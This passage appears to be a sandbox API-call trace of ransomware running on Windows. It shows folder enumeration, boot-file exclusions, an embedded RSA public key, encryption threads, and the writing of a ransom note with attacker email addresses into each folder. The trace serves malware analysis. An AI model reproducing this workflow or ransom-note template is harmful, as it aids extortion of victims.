hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0127.664] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0127.665] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0127.665] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0127.665] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0127.665] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0127.665] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0127.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0127.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0127.665] SetErrorMode (uMode=0x1) returned 0x1 [0127.665] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0127.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0127.665] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0127.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0127.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0127.665] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0127.665] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0127.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0127.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="Desktop") returned 0x0 [0127.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="DESKTOP") returned 0x0 [0127.665] SetErrorMode (uMode=0x1) returned 0x1 [0127.666] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT") returned 61 [0127.666] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0127.666] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0127.666] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x628) returned 0x0 [0127.666] RegQueryValueExW (in: hKey=0x628, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbcc50, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbcc50*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0127.666] RegCloseKey (hKey=0x628) returned 0x0 [0127.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0127.666] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0127.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0127.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0127.667] WriteFile (in: hFile=0x628, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0127.668] CloseHandle (hObject=0x628) returned 1 [0127.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0127.668] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0127.668] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0127.668] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0127.669] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0127.669] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0127.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0127.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0127.669] SetErrorMode (uMode=0x1) returned 0x1 [0127.669] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0127.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0127.669] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0127.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0127.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0127.669] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0127.669] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0127.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0127.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="Desktop") returned 0x0 [0127.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="DESKTOP") returned 0x0 [0127.669] SetErrorMode (uMode=0x1) returned 0x1 [0127.669] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT") returned 58 [0127.669] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0127.669] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0127.669] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x628) returned 0x0 [0127.670] RegQueryValueExW (in: hKey=0x628, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbce80, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbce80*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0127.670] RegCloseKey (hKey=0x628) returned 0x0 [0127.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0127.670] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0127.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0127.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0127.716] WriteFile (in: hFile=0x630, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0127.716] CloseHandle (hObject=0x630) returned 1 [0127.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0127.717] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0127.717] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0127.717] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0127.717] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0127.717] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0127.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0127.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0127.717] SetErrorMode (uMode=0x1) returned 0x1 [0127.717] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0127.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0127.717] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0127.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0127.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde1d8 [0127.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0127.717] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0127.717] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.717] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.717] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0127.718] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0127.718] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0127.718] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0127.718] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0127.718] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0127.718] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0127.718] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0127.718] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0127.718] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 46 [0127.718] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.718] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.718] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0127.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x634 [0127.718] Sleep (dwMilliseconds=0x96) [0127.894] FindNextFileW (in: hFindFile=0x3cde1d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0127.894] FindClose (in: hFindFile=0x3cde1d8 | out: hFindFile=0x3cde1d8) returned 1 [0127.894] FindClose (in: hFindFile=0x3cde1d8 | out: hFindFile=0x3cde1d8) returned 0 [0127.894] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0127.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0127.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0127.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0127.895] SetErrorMode (uMode=0x1) returned 0x1 [0127.895] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT") returned 63 [0127.895] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0127.895] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0127.895] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x628) returned 0x0 [0127.895] RegQueryValueExW (in: hKey=0x628, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ce9910, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3ce9910*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0127.895] RegCloseKey (hKey=0x628) returned 0x0 [0127.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0127.895] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0127.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0127.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 